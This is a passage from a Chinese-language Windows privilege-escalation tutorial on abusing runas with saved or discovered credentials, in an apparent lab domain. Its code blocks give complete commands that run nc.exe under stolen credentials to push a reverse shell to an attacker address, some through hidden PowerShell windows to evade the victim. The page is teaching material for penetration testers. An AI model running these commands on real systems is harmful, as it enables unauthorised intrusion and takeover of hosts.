<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">.\Seatbelt.exe CredEnum</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183653830-564658779-a24625d4bdc220363e50e99a68d2cc3f.png" width="933" height="526" class="img_ev3q"></p>
<p>在这里，可以看到 Seatbelt 获取的信息与命令 cmdkey /list 获取的信息是相同的。</p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="13使用存储的凭证执行命令"><strong><div id="id1.3">1.3、使用存储的凭证执行命令</div></strong><a href="#13使用存储的凭证执行命令" class="hash-link" aria-label="13使用存储的凭证执行命令的直接链接" title="13使用存储的凭证执行命令的直接链接">​</a></h4>
<p>在确定本机上存储有本地管理员账户的凭据后，我们就可以利用这些凭据使用 runas.exe 执行命令。</p>
<p>当尝试执行任何非 GUI 的命令（如 notepad 这种就属于 GUI 命令），如 whoami 或类似的 POC 命令时，我们将看不到有任何信息输出。这是因为 runas 是从另外一个“单独的窗口”执行的命令，为此，我们需要将输出重定向到一个文件来读取输出内容。</p>
<blockquote>
<p>注：“单独的窗口”：该窗口能否被看到取决于被执行的命令，对于 whoami 这类命令来说，这个单独的窗口就是一个后台进程，但对于 notepad 这类命令来说，这个单独的窗口就是一个可以看到的文本编辑器。</p>
<p>在 Reverse Shell 环境中执行 <code>runas /savecred /user:admin notepad</code> 这条命令时，这个窗口会出现在受害者的用户桌面环境。</p>
</blockquote>
<blockquote>
<p>runas 命令并不是被用来运行单个命令的，而是用来生成一个拥有不同账户权限的 shell。</p>
</blockquote>
<p>我们可以使用以下命令将 whoami 命令的输出重定向到文件：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">runas /env /noprofile /savecred /user:JUGG-efrost\administrator &quot;cmd.exe /c whoami &gt; whoami.txt&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183653634-980645492-ac75ef2786c4b6fc4de80c738ab9178c.png" width="1024" height="325" class="img_ev3q"></p>
<blockquote>
<p>注：如何在凭证管理器中<strong>添加和使用</strong>用户凭据。首次使用 <code>runas /savecred /user:admin cmd</code> 去执行命令时会被询问用户密码，当密码被正常输入之后，该用户凭据便被添加在凭据管理器中。当下次继续使用该方式 <code>runas /savecred /user:admin cmd</code> 去执行命令便不会再询问用户的密码。</p>
</blockquote>
<p>上图的结果显示，我们当前确实是以本地管理员的身份在运行命令。现在可以使用 runas 来获得反向 shell，可以用多种方式来做到这一点，但在这个例子中，我们将利用 nc.exe 将管理员 shell 推送回攻击者机器。</p>
<p>在攻击者计算机上启动一个 443 端口的监听器，然后就可以执行以下命令来获取 admin shell：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">runas /env /noprofile /savecred /user:JUGG-efrost\administrator &quot;c:\temp\nc.exe 172.16.1.30 443 -e cmd.exe&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654483-280747638-955f4c19f95f70fcb31611878c9fc960.png" width="503" height="182" class="img_ev3q"></p>
<p>值得一提的是，这可能会在受害者机器上打开 cmd 窗口，导致用户可以轻松关闭它。为此，我们可以使用 PowerShell 从隐藏窗口执行命令，从而增加隐蔽性。这样，受害者那边就不会打开任何窗口，也就不会那么轻松的就杀死我们的 shell。</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">runas /env /noprofile /savecred /user:JUGG-efrost\administrator &quot;powershell.exe -w hidden -c c:\temp\nc.exe 172.16.1.30 443 -e cmd.exe&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>此外，如果我们拥有对受害者机器的远程桌面权限，那么便不需要像上面那么麻烦，只需使用以下命令即可。</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">runas /env /noprofile /savecred /user:JUGG-efrost\administrator cmd</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="2通过提供的凭证进行-runas-提权"><strong><div id="id2">2、通过提供的凭证进行 RunAs 提权</div></strong><a href="#2通过提供的凭证进行-runas-提权" class="hash-link" aria-label="2通过提供的凭证进行-runas-提权的直接链接" title="2通过提供的凭证进行-runas-提权的直接链接">​</a></h2>
<p>假设当我们在受害者机器上站稳脚跟后，使用 cmdkey /list 命令没有找到任何存储的凭据，但在某个配置文件中找到了一个用户的账户及密码。</p>
<p>此时，本小节所介绍的技术在面对下面这种场景时还是很有用的：</p>
<ul>
<li>找到的账户凭据无法访问任何标准服务（SMB、RDP、WinRM），因此无法以该用户身份登录或获取 shell。</li>
<li>Any situation regarding an account that was added to the local admins group and port 3389 (RDP) is closed.【注：没懂作者这句话和上面那句有什么区别。】</li>
</ul>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="21-使用提供的凭证执行命令--gui"><strong><div id="id2.1">2.1 使用提供的凭证执行命令 – GUI</div></strong><a href="#21-使用提供的凭证执行命令--gui" class="hash-link" aria-label="21-使用提供的凭证执行命令--gui的直接链接" title="21-使用提供的凭证执行命令--gui的直接链接">​</a></h4>
<p>如果我们是通过远程桌面访问的受害者主机而不是反向 shell，那么可以直接使用 runas 命令来执行命令即可。但是，这种方式在反向 shell 中是不起作用的！</p>
<p>不起作用的原因是由于 Window 实施了安全措施。以前，runas 命令支持将用户名和密码的信息直接添加在参数中进行使用，但现在不可以了。</p>
<p>现在 Windows 去掉了 runas 命令中对密码参数的支持，更改为需要与用户交互来请求密码的方式。此外，我们也不能通过使用 echo-pipe 技巧将密码通过管道传输到命令来绕过这一点。</p>
<p>虽然如此，但在 GUI 环境下使用以下命令以其他用户身份生成 cmd shell 还是可以的：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">runas /env /noprofile /user:juggernaut.local\cmarko cmd</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654831-536143865-5fc6b425a58fd1d10f50a66309b66094.png" width="979" height="689" class="img_ev3q"></p>
<blockquote>
<p>如果账户未加入域，则 runas 参数中的 <code>/user:juggernaut.local\cmarko</code> 需要更改为 <code>/user:juggernaut\cmarko</code> 或 <code>/user:cmarko</code>。</p>
</blockquote>
<p>以往，可以在命令中直接传递密码。但当我们尝试这样做时，会发现该选项已不再可用，并会弹出帮助页面。</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">runas /env /noprofile /user:juggernaut.local\cmarko &quot;N0cturn@l21&quot; cmd</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>帮助页面告诉我们，现在只能在出现提示时输入用户的密码。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654363-1969912886-5bea754d2cd7ad60fe1cbe739f408ed0.png" width="614" height="147" class="img_ev3q"></p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="22使用提供的凭证执行命令--reverse-shell普通用户"><strong><div id="id2.2">2.2、使用提供的凭证执行命令 – Reverse Shell（普通用户）</div></strong><a href="#22使用提供的凭证执行命令--reverse-shell普通用户" class="hash-link" aria-label="22使用提供的凭证执行命令--reverse-shell普通用户的直接链接" title="22使用提供的凭证执行命令--reverse-shell普通用户的直接链接">​</a></h4>
<p>在本例中，假设目标计算机已关闭 RDP，而我们通过反向 shell 得到了一个用户名和密码，而反向 shell 又是非交互式的。这意味着，如果当前用户没有 GUI 访问权限，我们便无法像上面那样使用 runas 来执行命令了。</p>
<p>而要绕过这个问题，我们可以求助于 PowerShell！</p>
<blockquote>
<p>在反向 cmd shell 中运行 powershell -ep bypass 并不总是能成功进入到 powershell 会话，在大多数时候，这会导致 cmd shell 挂起和死机。如果遇到这种情况，我们可以使用 <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" target="_blank" rel="noopener noreferrer">Nishang</a> 的 PowerShell 反向 TCP 脚本来获取 PowerShell  会话。</p>
</blockquote>
<blockquote>
<p>注：<a href="https://github.com/antonioCoco/RunasCs" target="_blank" rel="noopener noreferrer">RunasCs</a> 工具亦可实现带密码的 runas 效果。</p>
</blockquote>
<p>借助 PowerShell，我们可以使用变量安全地存储找到的凭据，然后将变量传递到 Start-Process cmdlet 中。而这与 runas 命令的效果是相同的，只是不会有交互式密码提示，并且它将完全在反向 shell 中工作！</p>
<p>再次在 443 端口启动监听器，然后依次执行以下 3 条命令：</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">$secpasswd = ConvertTo-SecureString &quot;N0cturn@l21&quot; -AsPlainText -Force</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">$mycreds = New-Object System.Management.Automation.PSCredential (&quot;juggernaut.local\cmarko&quot;, $secpasswd)</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Start-Process -FilePath powershell.exe -argumentlist &quot;C:\temp\nc.exe 172.16.1.30 443 -e cmd.exe&quot; -Credential $mycreds</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<ul>
<li>第一个变量是密码（secpasswd）。</li>
<li>第二个变量是将密码分配给用户名（mycreds）。</li>
<li>第三行是要使用存储凭证运行的命令。</li>
</ul>
<p>执行后，我们将以获得一个 cmd shell。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654629-1163943706-1857ce75842ebc42a8d8e35349e5c4dd.png" width="503" height="179" class="img_ev3q"></p>
<p>同样的，就像之前一样，我们要隐藏可能出现在受害者控制台界面的窗口，以防受害者可以轻松的将桌面弹出的窗口给关闭掉。因此，可以将上面的  Start-Process 命令更改为以下命令：</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Start-Process -FilePath powershell.exe -argumentlist &quot;-w hidden -c C:\temp\nc.exe 172.16.1.30 443 -e cmd.exe&quot; -Credential $mycreds</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>现在可以以此用户的身份枚举系统，并希望能够进一步提升我们的权限。</p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="23使用提供的凭证执行命令--reverse-shell管理员用户"><strong><div id="id2.3">2.3、使用提供的凭证执行命令 – Reverse Shell（管理员用户）</div></strong><a href="#23使用提供的凭证执行命令--reverse-shell管理员用户" class="hash-link" aria-label="23使用提供的凭证执行命令--reverse-shell管理员用户的直接链接" title="23使用提供的凭证执行命令--reverse-shell管理员用户的直接链接">​</a></h4>
<p>在本例中，假设我们获取到了本地管理员组中的用户凭据，但该用户并不是内置管理员 administrator。此时，当我们使用上述 PowerShell runas 命令时，我们得到的其实是一个中完整性 shell。</p>
<blockquote>
<p>注：本小节和<a href="#id2.2">上一小节 2.2</a>的利用方式其实是一样的，唯一的区别就只是本小节还需要进行 UAC 绕过的操作（但 UAC 绕过的操作作者并未赘述）。</p>
</blockquote>
<p>这是 UAC 造成的结果。对于内置管理员账户，如果打开 cmd.exe，默认情况下会出现管理员提示。但是，如果你有一个本地管理员组中的用户，但不是内置的管理员账户，要获得管理员提示，你需要用 &quot;以管理员身份运行 &quot;打开 cmd.exe。如果我们只用该用户打开 cmd.exe，而不以管理员身份运行，则会得到一个标准的中完整性 shell。</p>
<p>让我们看看它的实际效果。使用命令 net localgroup administrators ，可以看到用户 vcreed 是此主机上的本地管理员。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654247-396458941-ff995410788b573d0dd3151e81fd03a2.png" width="748" height="215" class="img_ev3q"></p>
<p>我们在端口 443 上启动另一个监听器，然后加载以下变量并执行 runas 命令。</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">$secpasswd = ConvertTo-SecureString &quot;Dfaster1!23&quot; -AsPlainText -Force</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">$mycreds = New-Object System.Management.Automation.PSCredential (&quot;juggernaut.local\vcreed&quot;, $secpasswd)</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Start-Process -FilePath powershell.exe -argumentlist &quot;C:\temp\nc.exe 172.16.1.30 443 -e cmd.exe&quot; -Credential $mycreds</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>执行上述命令后，我们在监听器窗口获得了一个 vcreed 身份的 shell。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654415-2013753551-ce8c7130357085a5e02ad3bf068873ba.png" width="503" height="182" class="img_ev3q"></p>
<p>但是，当使用 whoami /priv 检查我们的权限时，会发现此时处于中完整性 shell 中，并且没有管理权限。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654481-1436334239-bf5cd7366c04a1b7d41432218567376c.png" width="631" height="230" class="img_ev3q"></p>
<p>从这里开始，我们需要对该用户进行 UAC 绕过，以将其从中完整性 shell 提升到高完整性 shell。</p>
<blockquote>
<p>要了解如何使用 UAC 绕过以从中完整性 shell 提升到高完整性 shell，请在<a href="https://www.cnblogs.com/kqdssheng/p/18745249" target="_blank" rel="noopener noreferrer">此处</a>查看有关该主题的文章。</p>
</blockquote></div></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="文件选项卡"><a class="pagination-nav__link pagination-nav__link--prev" href="/web/docs/渗透/Windows 提权/Windows 提权-PrintNightmare"><div class="pagination-nav__sublabel">上一页</div><div class="pagination-nav__label">Windows 提权-PrintNightmare</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/web/docs/渗透/Windows 提权/Windows 提权-SeBackupPrivilege 特权"><div class="pagination-nav__sublabel">下一页</div><div class="pagination-nav__label">Windows 提权-SeBackupPrivilege 特权</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#导航" class="table-of-contents__link toc-highlight">导航</a></li><li><a href="#0前言" class="table-of-contents__link toc-highlight"><strong><div>0、前言</div></strong></a></li><li><a href="#1通过存储的凭据进行-runas-提权" class="table-of-contents__link toc-highlight"><strong><div>1、通过存储的凭据进行 RunAs 提权</div></strong></a></li><li><a href="#2通过提供的凭证进行-runas-提权" class="table-of-contents__link toc-highlight"><strong><div>2、通过提供的凭证进行 RunAs 提权</div></strong></a></li></ul></div></div></div></div></main></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="footer__bottom text--center"><div class="margin-bottom--sm"><a href="https://www.cnblogs.com/kqdssheng" rel="noopener noreferrer" class="footerLogoLink_BH7S"><img src="/web/img/logo.svg" alt="博客园" class="footer__logo themedComponent_mlkZ themedComponent--light_NVdE" width="30" height="30"><img src="/web/img/logo.svg" alt="博客园" class="footer__logo themedComponent_mlkZ themedComponent--dark_xIcU" width="30" height="30"></a></div></div></div></footer></div>
</body>
</html>